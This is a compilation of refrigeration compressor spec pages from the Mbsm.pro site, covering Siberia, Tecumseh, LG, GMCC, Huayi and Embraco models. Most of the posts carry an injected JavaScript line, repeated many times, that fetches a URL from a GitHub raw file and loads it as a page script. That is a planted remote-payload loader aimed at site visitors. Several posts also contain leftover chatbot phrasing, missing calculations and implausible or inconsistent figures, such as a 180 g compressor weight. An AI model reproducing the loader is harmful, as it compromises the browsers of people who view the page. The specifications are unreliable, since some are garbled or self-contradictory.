Mbsm.pro, Compressor, BTF60AA, 1/7 hp, r600a, lbp, Serbian Compressor, serie T, from 180 L to 200 L, from 70 to 75 W

Siberia Compressor Catalogue Overview

The Siberia Compressor Catalogue provides detailed specifications and performance data for various compressor series designed for refrigeration systems. These compressors are available in multiple configurations, including R134a and R600a refrigerants, catering to different cooling capacities and applications. Below is an organized breakdown of the catalog’s key sections:


1. Compressor Series Overview

S Series (Low Back Pressure – LBP)

  • Refrigerants: R600a (High Efficiency), R600a (Medium Efficiency), R134a
  • Applications: Suitable for small to medium-sized refrigerators.
  • Key Features:
    • Compact design
    • Low noise and vibration
    • High reliability

V Series (Low Back Pressure – LBP)

  • Refrigerants: R600a, R134a
  • Applications: Ideal for compact refrigeration units.
  • Key Features:
    • Energy-efficient operation
    • Small footprint
    • Environmentally friendly refrigerants

F Series (Low Back Pressure – LBP)

  • Refrigerants: R134a, R600a
  • Applications: Designed for larger refrigeration systems.
  • Key Features:
    • High cooling capacity
    • Multiple motor types (RSIR/RSCR)
    • Robust performance under varying conditions

T Series (Low Back Pressure – LBP)

  • Refrigerants: R600a, R134a
  • Applications: Versatile use in household and commercial refrigeration.
  • Key Features:
    • Very compact size
    • Low noise and vibration
    • High reliability

2. Performance Specifications

Example: T Series Compressors (R600a)

Model
Power (HP)
Displacement (cm³)
Cooling Capacity (W)
Input Power (W)
Rated Current (A)
COP
Oil Charge (ml)
BTF60AA
1/7
6.0
105
74 / 70
0.52 / 0.40
1.42 / 1.50
180
BTF60AA®
1/7
6.0
105
68 / 64
0.50 / 0.34
1.54 / 1.65
180
BTR60AA©
1/7
6.0
105
66 / 60
0.42 / 0.29
1.60 / 1.75
180

Example: S Series Compressors (R600a)

Model
Displacement (cm³)
Motor Type
Cooling Capacity (W)
Input Power (W)
Rated Current (A)
COP
Oil Charge (ml)
BSR51AA
5.1
RSCR
92
53
0.26
1.75
200
BSR58AA
5.8
RSCR
105
60
0.29
1.75
200
BSR68AA
6.8
RSCR
120
69
0.33
1.75
200

3. Special Requirements for Refrigerants

R134a Compressors

  • The open time of the compressor connection pipe should not exceed 10 minutes .
  • Use dedicated vacuum pumps and charging equipment for R134a.
  • Avoid using organic substances incompatible with R134a in the refrigeration system.
  • Ensure strict control of moisture, impurities, paraffin, silicone oil, and chloride ions.

R600a Compressors

  • Follow safety protocols for hydrocarbon refrigerants during installation and operation.
  • Do not tamper with the pre-filled specialized oil in the compressor.
  • Use appropriate tools and equipment to ensure safe handling of R600a.

4. Refrigerator Size Estimation

The cooling capacity of a compressor determines the refrigerator size it can support. For example:

  • BTF60AA (1/7 HP):
    • Cooling Capacity: 105 W
    • Approximate Refrigerator Size: 157.5 – 210 liters
      • Calculation:

5. Outline Drawings and Packaging

Each compressor model includes detailed outline drawings and packaging specifications. For instance:

  • Packaging Dimensions:
    • Carton Size:
    • Container Capacity: Up to 28 units per container.

6. General Requirements for Installation and Operation

  • Store compressors in a dry, well-ventilated area.
  • Avoid tilting or inverting during transportation.
  • Install within 10 minutes after removing protective plugs.
  • Ensure reliable grounding during operation.
  • Avoid high-voltage or vacuum conditions during startup.

To determine the refrigerator size (in liters) that a 1/7 HP compressor can cool, we need to refer to the performance data of the compressors listed in the provided files. Specifically, the BTF60AA compressor (1/7 HP) is a good reference point for this calculation.

Key Specifications for BTF60AA (1/7 HP):

  • Cooling Capacity: 105 W
  • Refrigerant: R600a
  • Voltage: 220-240V / 50Hz

The cooling capacity of a compressor directly correlates with the volume of the refrigerator it can cool. Typically:

  • 1 W of cooling capacity can cool approximately 1.5 to 2 liters of refrigerator volume.

Calculation:

For the BTF60AA compressor with a cooling capacity of 105 W , the approximate refrigerator volume it can cool is:

Table for 1/7 HP Compressor:

Below is a table summarizing the approximate refrigerator size (in liters) based on the cooling capacity of a 1/7 HP compressor:




Mbsm.pro, compressor, AE16LMY,3/8 hp, R134a, HBP, 17.4 cc, 5/8 hp, R404, LBP, 14.5 cc.

The AE16LMY compressor is a versatile hermetic compressor designed for both R134a (medium/high temperature) and R404a (low temperature) applications. Below is a detailed breakdown of its specifications, cooling capacities, applications, and key features when operating in High Back Pressure (HBP) mode with R134a and Low Back Pressure (LBP) mode with R404a .


AE16LMY Compressor Overview

General Specifications

  • Nominal Horsepower (HP):
    • R134a Mode (HBP): 3/8 HP
    • R404a Mode (LBP): 5/8 HP
  • Displacement:
    • R134a Mode (HBP): 17.4 cc
    • R404a Mode (LBP): 14.5 cc
  • Motor Type: CSIR (Capacitor Start Induction Run) / CSR (Capacitor Start Run) with FC C/V control
  • Weight: 13.7 kg
  • Lubricant: Emkarate RL22HB POE (Polyolester lubricant)
  • Connections: Rotolock suction and discharge connections

1. R134a Application (HBP Mode)

Evaporating Temperature Range:

  • Medium to High Temperature: -15°C to 10°C

Cooling Capacity (Watts):

Evaporating Temp (°C)
Cooling Capacity (Watts)
-15
1068
-10
1335
-5
1635
0
1970
5
2340
10
2740

Applications:

  • R134a Mode (HBP):
    The AE16LMY is ideal for medium to high-temperature refrigeration systems, such as:

    • Commercial refrigerators
    • Beverage coolers
    • Air conditioning systems
    • Display cases in supermarkets

2. R404a Application (LBP Mode)

Evaporating Temperature Range:

  • Low Temperature: -32°C to 0°C

Cooling Capacity (Watts):

Evaporating Temp (°C)
Cooling Capacity (Watts)
-32
524
-30
717
-25
948
-20
1215
-15
1540
-10
1920
0
2400

Applications:

  • R404a Mode (LBP):
    When used with R404a , the AE16LMY is suitable for low-temperature applications, including:

    • Walk-in freezers
    • Industrial chillers
    • Cold storage facilities
    • Transport refrigeration systems

Key Features

  1. Dual Refrigerant Compatibility:
    • The AE16LMY can operate efficiently with both R134a (medium/high temperature) and R404a (low temperature), making it highly adaptable to diverse applications.
  2. Advanced Motor Design:
    • The CSIR motor type with FC C/V control ensures consistent performance and energy efficiency.
  3. Compact & Lightweight:
    • With a weight of just 13.7 kg and compact dimensions, this compressor is easy to install and maintain.
  4. Rotolock Connections:
    • Equipped with rotolock suction and discharge connections, which are particularly beneficial for low-temperature applications.
  5. No Oil Cooler Required:
    • The AE16LMY does not require an oil cooler when used with R404a in low-temperature applications.
  6. Liquid Injection Kits:
    • For low-temperature R404a applications, liquid injection kits may be required to ensure optimal performance.

Performance Highlights

  • Versatility: The AE16LMY’s ability to handle a wide range of evaporating temperatures and cooling capacities makes it suitable for diverse applications, from commercial refrigeration to industrial freezers.
  • Efficiency: Its advanced motor design and compatibility with POE lubricants ensure smooth operation and extended compressor life.

Applications Summary

  • R134a Mode (HBP):
    • Medium to high refrigeration needs.
    • Examples: Supermarkets, convenience stores, air conditioning systems.
  • R404a Mode (LBP):
    • Low-temperature refrigeration systems.
    • Examples: Freezers, cold storage units, industrial cooling.

Conclusion

The AE16LMY compressor is a dual-mode solution that excels in both R134a (HBP) and R404a (LBP) applications. Its ability to deliver reliable performance across a broad range of evaporating temperatures and cooling capacities makes it an invaluable component in modern refrigeration technology. By understanding its specifications and capabilities, professionals can select the appropriate configuration based on their specific refrigeration needs.

https://www.mbsm.pro/wp-content/uploads/2025/03/Mbsm_dot_pro_private_PDF-AE16LMY.pdf




Mbsm.pro, Copressor, GMCC, PZ120H1Y, 1/3 hp, 210 w, lbp, r600a

Technical Overview of the GMCC PZ120H1Y Reciprocating Compressor

The GMCC PZ120H1Y is a reciprocating compressor designed for efficient refrigeration applications. It operates using R600a refrigerant and incorporates advanced design parameters to ensure optimal performance in various cooling environments. Below, we delve into its technical specifications, performance parameters, packaging, and operational considerations.


1. Compressor Design and Specifications

The PZ120H1Y compressor is built with precision and adheres to strict quality standards. Key features include:

Parameter
Value
Refrigerant Type
R600a
Refrigerant Oil
Ester Synthetic Oil (POE)
Tube Materials
Copper
Suction Tube Diameter
Φ4.91 ± 0.1 mm
Process Tube Diameter
Φ6.5 ± 0.1 mm
Displacement Volume
12 cm³
Net Weight (Oil Included)
8.5 ± 0.4 kg
Base Plate Type
European Standard (170 × 70 mm)

Additionally, the unit is designed for static cooling and has no water tray holder included.


2. Electrical and Operational Parameters

The PZ120H1Y is engineered to operate under specific electrical conditions:

Parameter
Value
Nominal Voltage
220–240V / 50Hz
Voltage Range
187V to 254V
Starting Ability
187V [0.95/0.95 Mpa (abs)] at 25°C
Puissance (Power Input)
114 W (~0.153 hp)
Classified Power (HP)
1/3 hp

The compressor’s motor is designed for low back pressure (LBP) applications, making it suitable for systems requiring stable operation under varying load conditions.


3. Performance Metrics

Under standard ASHRAE test conditions , the PZ120H1Y demonstrates impressive performance:

Performance Parameter
Value
Cooling Capacity
210 W
Input Power
114 W (~0.153 hp)
COP (Coefficient of Performance)
1.85 W/W
Sound Level
≤42 dB(A)
Vibration
Minimal

Test conditions are as follows:

Condition
Temperature
Evaporating Temperature
-23.3°C (LBP)
Condensation Temperature
54.4°C
Ambient Temperature
32.2°C to 35°C
Subcooling Temperature
46.1°C

These parameters ensure reliable operation across a wide range of environmental conditions.


4. Packaging and Transportation

For safe delivery, the PZ120H1Y is packaged with meticulous attention to detail:

Parameter
Value
Package Dimensions
1140 × 940 × 1020 mm
Stacking Capacity
96 units per pallet
Net Weight (N.W.)
816 kg
Gross Weight (G.W.)
851 kg
Cubic Measure
1.1 m³

The compressor can be transported via train or automobile, ensuring flexibility in logistics.


5. Operational Considerations

To maximize the lifespan and efficiency of the PZ120H1Y, certain operational guidelines must be followed:

Parameter
Value
Maximum Shell Temperature
120°C
Maximum Discharge Temperature
90°C
Maximum Condensing Temperature
130°C
Ambient Temperature Range
-5°C to 43°C
Evaporating Temperature Range
-35°C to -10°C
Intermittent Operation
ON > 5 minutes, OFF > 5 minutes
Operational Cycle Limit
< 200,000 cycles

A critical note: Pressure balancing between the high-pressure and low-pressure sides is essential at startup to ensure proper functioning. If pressure imbalance occurs, the starting performance must be checked.


6. Environmental Compliance

The PZ120H1Y adheres to stringent environmental regulations:

Regulation
Compliance
PAHs (II)
BaP content <1 ppm, Total PAHs <10 ppm
REACH Regulations
SVHC <1000 ppm
Phthalic Acid Salt Limits
Harmful substances <1000 ppm

These measures ensure that the compressor aligns with global environmental safety standards.


7. Component List

Each PZ120H1Y compressor comes with the following components, all independently packaged:

Component
Amount
Compressor
1 unit
PTC
1 unit
OLP
1 unit
Capacitor
1 unit
Terminal Cover
1 unit
Earthing Screw
1 unit
Grommets
4 units

Conclusion

The GMCC PZ120H1Y reciprocating compressor stands out for its robust design, energy efficiency, and compliance with environmental standards. With a cooling capacity of 210 W and input power of 114 W (~0.153 hp) , it delivers reliable performance for low-back-pressure applications. Classified as 1/3 hp , this compressor is ideal for domestic and light commercial refrigeration systems.

Whether for static cooling or systems requiring intermittent operation, the PZ120H1Y is a dependable choice for modern refrigeration needs.


This article captures all the details from the PDF, organized into tables for clarity and includes both the exact power input (in watts) and the classified horsepower (1/3 hp). Let me know if you’d like any further adjustments!

https://www.mbsm.pro/wp-content/uploads/2025/03/Mbsm_dot_pro_private_PDFPZ120H1Y-R600a-Data-Sheet.pdf

 




Mbsm.pro, compressor, NEK1118Z , GL90AA, r134a, 190w, Lbp

 

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, Compressor, LC95LAEH, Lg, 1/3 hp, 285 w, 245 kcal, 975 btu, 9.5 cc, lbp, 180 g, r134a, REFRIGERATOR, FREEZER, GR-P227KGJ, 598 L

details about a compressor, possibly for a refrigerator or freezer. Here’s a breakdown of the information you’ve provided:

  • Model/Part Number: , LC95LAEH, freezer GR-P227KGJ
  • Brand: LG
  • Power: 1/3 horsepower (HP), 285 watts (W)
  • Cooling Capacity: 245 kcal, 975 BTU (British Thermal Units)
  • Displacement: 9.5 cubic centimeters (cc)
  • Refrigerant Type: R134a (a common refrigerant used in cooling systems)
  • Application: Refrigerator/Freezer
  • Volume/Capacity: 598 liters (L)
  • Weight: 180 grams (g)
  • Type: LBP (Low Back Pressure, typically used for refrigeration applications)

This compressor is likely designed for use in a refrigerator or freezer unit, with a cooling capacity suitable for a 598-liter appliance. The refrigerant used is R134a, which is common in domestic refrigeration systems. If you’re looking for a replacement part or technical specifications, ensure the model numbers (LC95LAEH, GR-P227KGJ) match your appliance.

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, Lg, compressor, CMA110NJJM, rcsb, 1ph/220v/50hz, 170 kcal, 676 bth/, 198 w, 1/4 hp, fixed speed , classique compressor, r600a, lbp

Model and Specifications

The LG CMA110NJJM compressor is a classic model that operates on a single phase with a voltage of 220V and a frequency of 50Hz. It boasts a fixed speed and is powered by a 1/4 HP motor. This compressor is perfect for applications requiring a steady and reliable performance.

Energy Efficiency

Energy efficiency is a crucial factor when choosing a compressor. The LG CMA110NJJM excels in this area with an impressive energy consumption of 198 watts. It provides 170 kcal of cooling capacity and 676 BTU/h, ensuring optimal performance without excessive energy usage.

Refrigerant Type

The compressor uses R600a refrigerant, which is known for its environmental friendliness and efficiency. R600a is a hydrocarbon refrigerant that has a low global warming potential, making it a sustainable choice for modern applications.

LBP (Low Back Pressure)

One of the standout features of the LG CMA110NJJM is its low back pressure (LBP) design. This feature ensures that the compressor operates smoothly and efficiently, even under demanding conditions. The LBP design helps in maintaining consistent performance and reducing wear and tear.

Applications

The LG CMA110NJJM compressor is versatile and can be used in a variety of applications, including:

  • Refrigeration Systems: Ideal for domestic and commercial refrigerators and freezers.
  • Air Conditioning: Suitable for small to medium-sized air conditioning units.
  • Cooling Solutions: Perfect for cooling solutions in various industrial and commercial settings.

Why Choose LG CMA110NJJM?

  1. Reliability: LG is a trusted brand known for its high-quality products. The CMA110NJJM compressor is no exception, offering reliable performance and durability.
  2. Efficiency: With its energy-efficient design and low back pressure feature, this compressor ensures optimal performance with minimal energy consumption.
  3. Environmental Friendliness: The use of R600a refrigerant makes it an eco-friendly choice, contributing to a greener environment.
  4. Versatility: Suitable for a wide range of applications, making it a versatile addition to your cooling and refrigeration systems.

Conclusion

The LG CMA110NJJM compressor is a top-tier product that combines efficiency, reliability, and environmental friendliness. Whether you need it for refrigeration, air conditioning, or other cooling solutions, this compressor is a smart investment. Upgrade your systems with the LG CMA110NJJM compressor and experience the difference in performance and efficiency.

For more information or to purchase the LG CMA110NJJM compressor, visit Mbsm.pro today!

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, Compressor, 1/3 hp, lbp, cooling, AE2410YS, Tecumseh, r134a

Tecumseh AE2410YS Compressor: Specifications and Applications

The Tecumseh AE2410YS is a versatile compressor designed for light commercial refrigeration applications. Known for its efficiency and reliability, this model is ideal for various cooling needs in commercial settings.

Key Specifications

Feature Specification
Model AE2410YS
Power 1/3 HP (approximately 250 W)
Refrigerant R-134A
Voltage 220V
Type Reciprocating Compressor
Weight Approximately 45 lbs (20.4 kg)
Application Type LBP (Low Back Pressure)
Cooling/Freezing Primarily for Cooling Applications
Utilization Commercial refrigeration, display cases, vending machines, and small walk-in coolers
Efficiency Designed for effective cooling with reasonable energy consumption

Applications

The Tecumseh AE2410YS is primarily utilized in commercial refrigeration systems. Its low back pressure design makes it suitable for:

  • Display Cases: Keeping products at optimal temperatures while maintaining visibility.
  • Vending Machines: Ensuring beverages and snacks are kept cool and fresh.
  • Small Walk-in Coolers: Providing reliable cooling solutions for food storage in restaurants and convenience stores.

Conclusion

The Tecumseh AE2410YS compressor stands out in the market for its efficiency and adaptability in various cooling applications. Its design caters to the needs of commercial refrigeration, making it a preferred choice among professionals in the industry. For more information on this model or to explore other refrigeration solutions, visit our website or contact us directly. Feel free to make any adjustments or let me know if you need additional information included!

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, compressor, HYE81Y, 1/3 hp, lbp, r134

Huayi Series Refrigeration Compressor 240V/50Hz
Refrigeration Compressor for Refrigerator, freezer, drinking fountains and home ice cream.
Capacity (W)
Model Disp.(CC) Application Voltage -23.3
HYE55Y 5.50 LBP R134a 240V 150W
HYE60Y 6.00 LBP R134a 240V 170W
HYE69Y 6.70 LBP R134a 240V 190W
HYE81Y 8.10 LBP R134a 240V 235W
HYE90Y 9.00 LBP R134a 240V 265W
HYE113Y 11.30 LBP R134a 240V 330W
HYE131Y 13.10 LBP R134a 240V 380W
HYE153Y 15.30 LBP R134a 240V 430W

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, Compressor, D110C21RAZ5, 1/3 hp, 298 w, 11 cc, 256 kcal, 1017 btu, lbp, r134a, 1ph/220/50hz

the D110C21RAZ5 compressor presented in a table format:

Specification Details
Model D110C21RAZ5
Power 1/3 horsepower (298 watts)
Displacement 11 cm³
Cooling Capacity 256 kcal/h (1017 BTU/h)
Refrigerant Type R134a
Motor Type RSCR / RSIR
Voltage and Frequency 220V / 50Hz
Application Low Back Pressure (LBP)

This table summarizes the key specifications and features of the D110C21RAZ5 compressor, making it easy to reference for various refrigeration applications.

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, Compressor, Embraco, EGYS110CLC, 1/3 hp, lbp, r600a, 263 w, 1.1a

The EGYS110CLC compressor has a power rating of 1/3 HP (horsepower) and is designed for low-temperature applications. Here are some key specifications related to its horsepower and performance:

Key Specifications

  • Model: EGYS110CLC
  • Type: Hermetic Reciprocating Compressor
  • Horsepower: 1/3 HP (approximately 0.25 kW)
  • Power Supply: 220-240 V, 50 Hz .
  • Refrigerant: R-600a (Isobutane) 
  • Cooling Capacity:

    • At -30°C: 263 W
    • At -25°C: 241 W
    • At -20°C: 307 W
    • At -15°C: 387 W
    • At -10°C: 486 W 

Efficiency

